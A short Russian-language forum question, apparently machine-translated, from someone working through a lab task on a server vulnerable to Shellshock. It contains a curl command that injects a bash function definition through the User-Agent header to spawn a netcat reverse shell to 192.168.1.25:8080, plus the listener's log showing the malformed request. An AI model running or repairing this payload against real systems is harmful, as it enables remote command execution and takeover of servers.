Я пытаюсь использовать виртуальный сервер, обладающий способностью воспринимать шок от оболочки. Я успешно выполнил 2 части своей задачи и пытаюсь завершить третью часть, для которой мне нужна обратная оболочка. У меня есть команда ниже, но, похоже, я только подключаюськ netcat с эхом моей машины и справки о том, что идет не так, вот что я получаю, когда выполняю строку на сервере
, слушая [любое] 8080 ...
connect to [192.168.1.25] from matts-PC [192.168.1.25] 57635
GET / HTTP/1.1
Host: 192.168.1.25:8080
User-Agent: curl/7.55.1
Accept: */*
Referer: /bin/bash" http://127.0.0.1:6262/cgi-bin/shellshock.cgi
user-agent () { :; }; /bin/bash netcat
Я перепробовал множество вариантов нижеприведенного эксплойта с одинаковым результатом
curl -H "user-agent () { :; }; /bin/bash "netcat -nv 192.168.1.25:8080 -e /bin/bash\"" http://127.0.0.1:6262/cgi-bin/shellshock.cgi